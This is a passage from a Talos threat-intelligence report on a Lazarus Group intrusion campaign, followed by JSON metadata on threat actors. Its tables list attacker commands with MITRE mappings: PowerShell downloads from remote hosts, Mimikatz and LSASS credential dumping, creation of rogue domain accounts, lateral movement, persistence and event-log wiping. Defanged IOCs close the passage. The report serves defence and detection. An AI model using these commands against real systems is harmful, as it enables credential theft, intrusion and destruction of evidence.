Discovery\r\n[T1087/002]\r\nUnauthorized account creations\r\nIn most instances, the attackers instrumented the reverse shell to create their own user accounts on the endpoints they\r\nhad initial access to. Similar activity was also seen being conducted via the VSingle implant as it was propagated across\r\nan enterprise.\r\nCommand Intent\r\nnet1 group /domain Domain discovery [T1087/002]\r\nhttps://blog.talosintelligence.com/lazarus-three-rats/\r\nPage 18 of 25\n\nCommand Intent\r\nnet1 user \u003cusername\u003e \u003cpassword\u003e /domain Create Account [T1136/002]\r\nnet1 user \u003cusername\u003e /active:yes /domain Create Account [T1136/002]\r\nnet1 group \u003cgroupname\u003e /add /domain Create Account [T1136/002]\r\nnet1 group \u003cgroupname\u003e \u003cusername\u003e /add /domain Create Account [T1136/002]\r\nAdditional tools used\r\nIn some cases, the attackers deployed commonly used tools often seen from other threat actors.\r\nMimikatz\r\nThe attackers downloaded the Mimikatz tool from their server, inside a .rar archive protected with a password, which\r\nprevents any kind of detection by network intrusion prevention systems.\r\nCommand Intent\r\npowershell -exec bypass -command (New-Object\r\nSystem.Net.WebClient).DownloadFile('http://\u003cremote_location\u003e/mi.tmp',\r\n'\u003clocal_path\u003e\\m.tmp')\r\nDownload\r\nPayloads\r\n[T1608/001]\r\npowershell -exec bypass -command (New-Object\r\nSystem.Net.WebClient).DownloadFile('http://\u003cremote_location\u003e/mi64.tmp',\r\n'\u003clocal_path\u003e\\mi.tmp')\r\nDownload\r\nPayloads\r\n[T1608/001]\r\npowershell -exec bypass -command (New-Object\r\nSystem.Net.WebClient).DownloadFile('http://\u003cremote_location\u003e/mm.rar',\r\n'\u003clocal_path\u003e\\mm.tmp')\r\nDownload\r\nPayloads\r\n[T1608/001]\r\n\u003clocal_path\u003e\\rar.exe e \u003clocal_path\u003e\\m.tmp \u003clocal_path\u003e\\ -p\u003cpassword\u003e\r\nExtract files\r\n[T1140]\r\n\u003clocal_path\u003e\\mi.exe privilege::debug sekurlsa::logonPasswords exit\r\nOS Credential\r\nDumping\r\n[T1003/001]\r\nProcdump\r\nAlong with Mimikatz, the attackers also used procdump to dump the LSASS memory to a file on disk.\r\nhttps://blog.talosintelligence.com/lazarus-three-rats/\r\nPage 19 of 25\n\nCommand Intent\r\npowershell -exec bypass -command (New-Object\r\nSystem.Net.WebClient).DownloadFile('http://\u003cremote_location\u003e/pd64.tmp',\r\n'\u003clocal_path\u003e\\pd.tmp')\r\nDownload\r\nPayloads\r\n[T1608/001]\r\nren \u003clocal_path\u003e\\pd.tmp pd64.exe Rename files\r\n\u003clocal_path\u003e\\pd64.exe -accepteula -ma lsass \u003clocal_path\u003e\\z_pd.dmp\r\nOS Credential\r\nDumping\r\n[T1003/001]\r\nSocks proxy\r\nIn another instance, the attackers downloaded and set up a SOCKS proxy on the local endpoint, including the use of\r\n3proxy.\r\nCommand Intent\r\npowershell -exec bypass -command (New-Object\r\nSystem.Net.WebClient).DownloadFile('http://\u003cremote_location\u003e/spr.tmp',\r\n'\u003clocal_path\u003e\\spr.tmp')\r\nDownload\r\nPayloads\r\n[T1608/001]\r\n\u003clocal_path\u003e\\rar.exe e \u003clocal_path\u003e\\spr.tmp \u003clocal_path_2\u003e -p\u003cpassword\u003e\r\nExtract files\r\n[T1140]\r\n\u003clocal_path_2\u003e\\msconf.exe -i 84[.]38[.]133[.]145 -p \u003cPort_number\u003e Proxy [T1090]\r\nImplant deployment and lateral movement\r\nAcross the first endpoints compromised in the enterprises, we observed the attackers downloading their custom\r\nimplants from remote locations and deploying and persisting them on the systems.\r\nCommand Intent\r\nWMIC /node:\u003cComputer_Name\u003e process call create \"powershell.exe (New-Object\r\nSystem.Net.Webclient).DownloadFile('\u003cremote_location\u003e/svhostw.exe','\u003clocal_path\u003e\\\\svhostww.exe')\"\r\nDownload\r\nPayloads\r\n[T1608/001]\r\nsc create \u003cservice_name\u003e type= own type= interact start= auto error= ignore binpath= cmd /K start\r\n\u003clocal_path_2\u003e\\\\svhostww.exe\r\nPersistence\r\n[T1543/003]\r\nOn the endpoints that were breached by performing lateral movement from an already compromised host, the implants\r\nwere deployed either from a remote external location or the source host itself by opening up interactive shells and the\r\nuse of implacket tools:\r\nhttps://blog.talosintelligence.com/lazarus-three-rats/\r\nPage 20 of 25\n\nCommand Intent\r\npowershell.exe Enter-PSSession\r\nRemote Access\r\n[T1219]\r\npowershell.exe Invoke-Command -ComputerName \u003cComputerName\u003e -ScriptBlock {cmd.exe\r\n/c dir}\r\nRemote Access\r\n[T1219]\r\npython wmiexec.py \u003cuserid\u003e:\u003cpassword\u003e@\u003clocal_IP_of_another_endpoint\u003e 1\u003e\r\n\\\\127.0.0.1\\ADMIN$\\\u003cimpacket_log_file\u003e 2\u003e\u00261\r\nRemote Access\r\n[T1219]\r\nCleanup\r\nOnce the backdoors and implants were persisted and activated on the endpoint, the reverse shell used to perform\r\ncleanup [T1070], this included deleting all files in the infection folder along with the termination of the powershell\r\ntasks. The attacker-created accounts were removed and, finally, the Windows Event logs [T1070/001] would be purged\r\nwith the command below.\r\nfor /F tokens=* %1 in ('wevtutil.exe el') DO wevtutil.exe cl %1 1\u003e \\\\127.0.0.1\\ADMIN$\\\u003clog_file_name\u003e 2\u003e\u00261\r\nManual operations\r\nIn multiple instances, the attackers mistyped commands on the infected endpoint via the reverse shell, indicating that\r\nthe commands were being served by an operator manually operating the infections:\r\nip config /all\r\nnet suer\r\nnetstat -noa | finstr 3389\r\npowrshell.exe Get-AdUser -Filter * -Properties * | Select Name, logonCount\r\npowrshell.exe Get-AdComputer -Filter * -Properties * | select Name, LastLogonDate, lastLogon, IPv4Address\r\nCoverage\r\nWays our customers can detect and block this threat are listed below.\r\nhttps://blog.talosintelligence.com/lazarus-three-rats/\r\nPage 21 of 25\n\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed\r\nin this post. Try Secure Endpoint for free here.\r\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these\r\nattacks.\r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their\r\ncampaign. You can try Secure Email for free here.\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense\r\nVirtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.\r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure\r\nproducts.\r\nUmbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs,\r\nwhether users are on or off the corporate network. Sign up for a free trial of Umbrella here.\r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and\r\ntests suspicious sites before users access them.\r\nhttps://blog.talosintelligence.com/lazarus-three-rats/\r\nPage 22 of 25\n\nAdditional protections with context to your specific environment and threat data are available from the Firewall\r\nManagement Center.\r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.\r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for\r\npurchase on Snort.org.\r\nOrbital Queries\r\nCisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are\r\ninfected with this specific threat. For specific OSqueries on this threat, click here and here.\r\nIOCS\r\nThe IOC list is also available in Talos' Github repo here.\r\nVSingle\r\n586F30907C3849C363145BFDCDABE3E2E4688CBD5688FF968E984B201B474730\r\nMagicRAT\r\n8ce219552e235dcaf1c694be122d6339ed4ff8df70bf358cd165e6eb487ccfc5\r\nc2904dc8bbb569536c742fca0c51a766e836d0da8fac1c1abd99744e9b50164f\r\ndda53eee2c5cb0abdbf5242f5e82f4de83898b6a9dd8aa935c2be29bafc9a469\r\n90fb0cd574155fd8667d20f97ac464eca67bdb6a8ee64184159362d45d79b6a4\r\nYamaBotf\r\n226086b5959eb96bd30dec0ffcbf0f09186cd11721507f416f1c39901addafb\r\nProcdump\r\n16F413862EFDA3ABA631D8A7AE2BFFF6D84ACD9F454A7ADAA518C7A8A6F375A5\r\n05732E84DE58A3CC142535431B3AA04EFBE034CC96E837F93C360A6387D8FAAD\r\nMimikatz\r\n6FBB771CD168B5D076525805D010AE0CD73B39AB1F4E6693148FE18B8F73090B\r\n912018AB3C6B16B39EE84F17745FF0C80A33CEE241013EC35D0281E40C0658D9\r\nCAF6739D50366E18C855E2206A86F64DA90EC1CDF3E309AEB18AC22C6E28DC65\r\n3Proxy\r\n2963a90eb9e499258a67d8231a3124021b42e6c70dacd3aab36746e51e3ce37e\r\nPuTTY\r\nhttps://blog.talosintelligence.com/lazarus-three-rats/\r\nPage 23 of 25\n\nplink2AA1BBBE47F04627A8EA4E8718AD21F0D50ADF6A32BA4E6133EE46CE2CD13780\r\n5A73FDD0C4D0DEEA80FA13121503B477597761D82CF2CFB0E9D8DF469357E3F8\r\nAdfind\r\nC92C158D7C37FEA795114FA6491FE5F145AD2F8C08776B18AE79DB811E8E36A3\r\nIPs\r\n104[.]155[.]149[.]103\r\n40[.]121[.]90[.]194\r\n185[.]29[.]8[.]162\r\n146[.]4[.]21[.]94\r\n46[.]183[.]221[.]109\r\n84[.]38[.]133[.]145\r\n109[.]248[.]150[.]13\r\n155[.]94[.]210[.]11\r\n192[.]186[.]183[.]133\r\n54[.]68[.]42[.]4\r\n84[.]38[.]133[.]145\r\n213[.]180[.]180[.]154\r\nURLS\r\nhxxp[://]104[.]155[.]149[.]103/2-443[.]ps1\r\nhxxp[://]104[.]155[.]149[.]103/8080[.]ps1\r\nhxxp[://]104[.]155[.]149[.]103/mi64[.]tmp\r\nhxxp[://]104[.]155[.]149[.]103/mi[.]tmp\r\nhxxp[://]104[.]155[.]149[.]103/mm[.]rar\r\nhxxp[://]104[.]155[.]149[.]103/pd64[.]tmp\r\nhxxp[://]104[.]155[.]149[.]103/rar[.]tmp\r\nhxxp[://]104[.]155[.]149[.]103/spr[.]tmp\r\nhxxp[://]104[.]155[.]149[.]103/t[.]tmp\r\nhxxp[://]104[.]155[.]149[.]103/update[.]tmp\r\nhxxp[://]109[.]248[.]150[.]13:8080/1\r\nhxxp[://]146[.]4[.]21[.]94/tmp/data_preview/virtual[.]php\r\nhxxp[://]185[.]29[.]8[.]162:443/1[.]tmp\r\nhxxp[://]40[.]121[.]90[.]194/11[.]jpg\r\nhxxp[://]40[.]121[.]90[.]194/300dr[.]cert\r\nhxxp[://]40[.]121[.]90[.]194/b[.]cert\r\nhxxp[://]40[.]121[.]90[.]194/qq[.]cert\r\nhxxp[://]40[.]121[.]90[.]194/ra[.]cert\r\nhxxp[://]40[.]121[.]90[.]194/Rar[.]jpg\r\nhxxp[://]40[.]121[.]90[.]194/tt[.]rar\r\nhxxp[://]46[.]183[.]221[.]109//dfdfdfdfdfdfdfdfdfaflakjdfljaldjfladfljaldkfjlajdsflajdskf/huntertroy[.]exe\r\nhxxp[://]46[.]183[.]221[.]109//dfdfdfdfdfdfdfdfdfaflakjdfljaldjfladfljaldkfjlajdsflajdskf/svhostw[.]exe\r\nhttps://blog.talosintelligence.com/lazarus-three-rats/\r\nPage 24 of 25\n\nhxxp[://]84[.]38[.]133[.]145/board[.]html\r\nhxxp[://]84[.]38[.]133[.]145/header[.]xml\r\nhxxp[://]www[.]ajoa[.]org/home/manager/template/calendar[.]php\r\nhxxp[://]www[.]ajoa[.]org/home/rar[.]tmp\r\nhxxp[://]www[.]ajoa[.]org/home/tmp[.]ps1\r\nhxxp[://]www[.]ajoa[.]org/home/ztt[.]tmp\r\nhxxp[://]www[.]orvi00[.]com/ez/admin/shop/powerline[.]tmp\r\nVSingle C2s\r\nhxxps[://]tecnojournals[.]com/review\r\nhxxps[://]semiconductboard[.]com/xml\r\nhxxp[://]cyancow[.]com/find\r\nMagicRAT C2s\r\nhxxp[://]155[.]94[.]210[.]11/news/page[.]php\r\nhxxp[://]192[.]186[.]183[.]133/bbs/board[.]php\r\nhxxp[://]213[.]32[.]46[.]0/board[.]php\r\nhxxp[://]54[.]68[.]42[.]4/mainboard[.]php\r\nhxxp[://]84[.]38[.]133[.]145/apollom/jeus[.]php\r\nhxxp[://]mudeungsan[.]or[.]kr/gbbs/bbs/template/g_botton[.]php\r\nhxxp[://]www[.]easyview[.]kr/board/Kheader[.]php\r\nhxxp[://]www[.]easyview[.]kr/board/mb_admin[.]php\r\nYamaBot C2s\r\nhxxp[://]213[.]180[.]180[.]154/editor/session/aaa000/support[.]php\r\nSource: https://blog.talosintelligence.com/lazarus-three-rats/\r\nhttps://blog.talosintelligence.com/lazarus-three-rats/\r\nPage 25 of 25", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "references": [ "https://blog.talosintelligence.com/lazarus-three-rats/" ], "report_names": [ "lazarus-three-rats" ], "threat_actors": [ { "id": "838f6ced-12a4-4893-991a-36d231d96efd", "created_at": "2022-10-25T15:50:23.347455Z", "updated_at": "2026-04-10T02:00:05.295717Z", "deleted_at": null, "main_name": "Andariel", "aliases": [ "Andariel", "Silent Chollima", "PLUTONIUM", "Onyx Sleet" ], "source_name": "MITRE:Andariel", "tools": [ "Rifdoor", "gh0st RAT" ], "source_id": "MITRE", "reports": null }, { "id": "34eea331-d052-4096-ae03-a22f1d090bd4", "created_at": "2025-08-07T02:03:25.073494Z", "updated_at": "2026-04-10T02:00:03.709243Z", "deleted_at": null, "main_name": "NICKEL ACADEMY", "aliases": [ "ATK3 ", "Black Artemis ", "COVELLITE ", "CTG-2460 ", "Citrine Sleet ", "Diamond Sleet ", "Guardians of Peace", "HIDDEN COBRA ", "High Anonymous", "Labyrinth Chollima ", "Lazarus Group ", "NNPT Group", "New Romanic Cyber Army Team", "Temp.Hermit ", "UNC577 ", "Who Am I?", "Whois Team", "ZINC " ], "source_name": "Secureworks:NICKEL ACADEMY", "tools": [ "Destover", "KorHigh", "Volgmer" ], "source_id": "Secureworks", "reports": null }, { "id": "110e7160-a8cc-4a66-8550-f19f7d418117", "created_at": "2023-01-06T13:46:38.427592Z", "updated_at": "2026-04-10T02:00:02.969896Z", "deleted_at": null, "main_name": "Silent Chollima", "aliases": [ "Onyx Sleet", "PLUTONIUM", "OperationTroy", "Guardian of Peace", "GOP", "WHOis Team", "Andariel", "Subgroup: Andariel" ], "source_name": "MISPGALAXY:Silent Chollima", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "bc6e3644-3249-44f3-a277-354b7966dd1b", "created_at": "2022-10-25T16:07:23.760559Z", "updated_at": "2026-04-10T02:00:04.741239Z", "deleted_at": null, "main_name": "Andariel", "aliases": [ "APT 45", "Andariel", "G0138", "Jumpy Pisces", "Onyx Sleet", "Operation BLACKMINE", "Operation BLACKSHEEP/Phase 3.", "Operation Blacksmith", "Operation DESERTWOLF/Phase 3", "Operation GHOSTRAT", "Operation GoldenAxe", "Operation INITROY/Phase 1", "Operation INITROY/Phase 2", "Operation Mayday", "Operation VANXATM", "Operation XEDA", "Plutonium", "Silent Chollima", "Stonefly" ], "source_name": "ETDA:Andariel", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-10T02:00:03.776007Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "771d9263-076e-4b6e-bd58-92b6555eb739", "created_at": "2025-08-07T02:03:25.092436Z", "updated_at": "2026-04-10T02:00:03.758541Z", "deleted_at": null, "main_name": "NICKEL HYATT", "aliases": [ "APT45 ", "Andariel", "Dark Seoul", "Jumpy Pisces ", "Onyx Sleet ", "RIFLE Campaign", "Silent Chollima ", "Stonefly ", "UN614 " ], "source_name": "Secureworks:NICKEL HYATT", "tools": [ "ActiveX 0-day", "DTrack", "HazyLoad", "HotCriossant", "Rifle", "UnitBot", "Valefor" ], "source_id": "Secureworks", "reports": null }, { "id": "32a223a8-3c79-4146-87c5-8557d38662ae", "created_at": "2022-10-25T15:50:23.703698Z", "updated_at": "2026-04-10T02:00:05.261989Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Lazarus Group", "Labyrinth Chollima", "HIDDEN COBRA", "Guardians of Peace", "NICKEL ACADEMY", "Diamond Sleet" ], "source_name": "MITRE:Lazarus Group", "tools": [ "RawDisk", "Proxysvc", "BADCALL", "FALLCHILL", "WannaCry", "MagicRAT", "HOPLIGHT", "TYPEFRAME", "Dtrack", "HotCroissant", "HARDRAIN", "Dacls", "KEYMARBLE", "TAINTEDSCRIBE", "AuditCred", "netsh", "ECCENTRICBANDWAGON", "AppleJeus", "BLINDINGCAN", "ThreatNeedle", "Volgmer", "Cryptoistic", "RATANKBA", "Bankshot" ], "source_id": "MITRE", "reports": null }, { "id": "f32df445-9fb4-4234-99e0-3561f6498e4e", "created_at": "2022-10-25T16:07:23.756373Z", "updated_at": "2026-04-10T02:00:04.739611Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "APT-C-26", "ATK 3", "Appleworm", "Citrine Sleet", "DEV-0139", "Diamond Sleet", "G0032", "Gleaming Pisces", "Gods Apostles", "Gods Disciples", "Group 77", "Guardians of Peace", "Hastati Group", "Hidden Cobra", "ITG03", "Jade Sleet", "Labyrinth Chollima", "Lazarus Group", "NewRomanic Cyber Army Team", "Operation 99", "Operation AppleJeus", "Operation AppleJeus sequel", "Operation Blockbuster: Breach of Sony Pictures Entertainment", "Operation CryptoCore", "Operation Dream Job", "Operation Dream Magic", "Operation Flame", "Operation GhostSecret", "Operation In(ter)caption", "Operation LolZarus", "Operation Marstech Mayhem", "Operation No Pineapple!", "Operation North Star", "Operation Phantom Circuit", "Operation Sharpshooter", "Operation SyncHole", "Operation Ten Days of Rain / DarkSeoul", "Operation Troy", "SectorA01", "Slow Pisces", "TA404", "TraderTraitor", "UNC2970", "UNC4034", "UNC4736", "UNC4899", "UNC577", "Whois Hacking Team" ], "source_name": "ETDA:Lazarus Group", "tools": [ "3CX Backdoor", "3Rat Client", "3proxy", "AIRDRY", "ARTFULPIE", "ATMDtrack", "AlphaNC", "Alreay", "Andaratm", "AngryRebel", "AppleJeus", "Aryan", "AuditCred", "BADCALL", "BISTROMATH", "BLINDINGCAN", "BTC Changer", "BUFFETLINE", "BanSwift", "Bankshot", "Bitrep", "Bitsran", "BlindToad", "Bookcode", "BootWreck", "BottomLoader", "Brambul", "BravoNC", "Breut", "COLDCAT", "COPPERHEDGE", "CROWDEDFLOUNDER", "Castov", "CheeseTray", "CleanToad", "ClientTraficForwarder", "CollectionRAT", "Concealment Troy", "Contopee", "CookieTime", "Cyruslish", "DAVESHELL", "DBLL Dropper", "DLRAT", "DRATzarus", "DRATzarus RAT", "Dacls", "Dacls RAT", "DarkComet", "DarkKomet", "DeltaCharlie", "DeltaNC", "Dembr", "Destover", "DoublePulsar", "Dozer", "Dtrack", "Duuzer", "DyePack", "ECCENTRICBANDWAGON", "ELECTRICFISH", "Escad", "EternalBlue", "FALLCHILL", "FYNLOS", "FallChill RAT", "Farfli", "Fimlis", "FoggyBrass", "FudModule", "Fynloski", "Gh0st RAT", "Ghost RAT", "Gopuram", "HARDRAIN", "HIDDEN COBRA RAT/Worm", "HLOADER", "HOOKSHOT", "HOPLIGHT", "HOTCROISSANT", "HOTWAX", "HTTP Troy", "Hawup", "Hawup RAT", "Hermes", "HotCroissant", "HotelAlfa", "Hotwax", "HtDnDownLoader", "Http Dr0pper", "ICONICSTEALER", "Joanap", "Jokra", "KANDYKORN", "KEYMARBLE", "Kaos", "KillDisk", "KillMBR", "Koredos", "Krademok", "LIGHTSHIFT", "LIGHTSHOW", "LOLBAS", "LOLBins", "Lazarus", "LightlessCan", "Living off the Land", "MATA", "MBRkiller", "MagicRAT", "Manuscrypt", "Mimail", "Mimikatz", "Moudour", "Mydoom", "Mydoor", "Mytob", "NACHOCHEESE", "NachoCheese", "NestEgg", "NickelLoader", "NineRAT", "Novarg", "NukeSped", "OpBlockBuster", "PCRat", "PEBBLEDASH", "PLANKWALK", "POOLRAT", "PSLogger", "PhanDoor", "Plink", "PondRAT", "PowerBrace", "PowerRatankba", "PowerShell RAT", "PowerSpritz", "PowerTask", "Preft", "ProcDump", "Proxysvc", "PuTTY Link", "QUICKRIDE", "QUICKRIDE.POWER", "Quickcafe", "QuiteRAT", "R-C1", "ROptimizer", "Ratabanka", "RatabankaPOS", "Ratankba", "RatankbaPOS", "RawDisk", "RedShawl", "Rifdoor", "Rising Sun", "Romeo-CoreOne", "RomeoAlfa", "RomeoBravo", "RomeoCharlie", "RomeoCore", "RomeoDelta", "RomeoEcho", "RomeoFoxtrot", "RomeoGolf", "RomeoHotel", "RomeoMike", "RomeoNovember", "RomeoWhiskey", "Romeos", "RustBucket", "SHADYCAT", "SHARPKNOT", "SIGFLIP", "SIMPLESEA", "SLICKSHOES", "SORRYBRUTE", "SUDDENICON", "SUGARLOADER", "SheepRAT", "SierraAlfa", "SierraBravo", "SierraCharlie", "SierraJuliett-MikeOne", "SierraJuliett-MikeTwo", "SimpleTea", "SimplexTea", "SmallTiger", "Stunnel", "TAINTEDSCRIBE", "TAXHAUL", "TFlower", "TOUCHKEY", "TOUCHMOVE", "TOUCHSHIFT", "TOUCHSHOT", "TWOPENCE", "TYPEFRAME", "Tdrop", "Tdrop2", "ThreatNeedle", "Tiger RAT", "TigerRAT", "Trojan Manuscript", "Troy", "TroyRAT", "VEILEDSIGNAL", "VHD", "VHD Ransomware", "VIVACIOUSGIFT", "VSingle", "ValeforBeta", "Volgmer", "Vyveva", "W1_RAT", "Wana Decrypt0r", "WanaCry", "WanaCrypt", "WanaCrypt0r", "WannaCry", "WannaCrypt", "WannaCryptor", "WbBot", "Wcry", "Win32/KillDisk.NBB", "Win32/KillDisk.NBC", "Win32/KillDisk.NBD", "Win32/KillDisk.NBH", "Win32/KillDisk.NBI", "WinorDLL64", "Winsec", "WolfRAT", "Wormhole", "YamaBot", "Yort", "ZetaNile", "concealment_troy", "http_troy", "httpdr0pper", "httpdropper", "klovbot", "sRDI" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434310, "ts_updated_at": 1775792299, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/f25826652b1c6ec00e81e49eedbeb68475535d76.pdf", "text": "https://archive.orkl.eu/f25826652b1c6ec00e81e49eedbeb68475535d76.txt", "img": "https://archive.orkl.eu/f25826652b1c6ec00e81e49eedbeb68475535d76.jpg" } }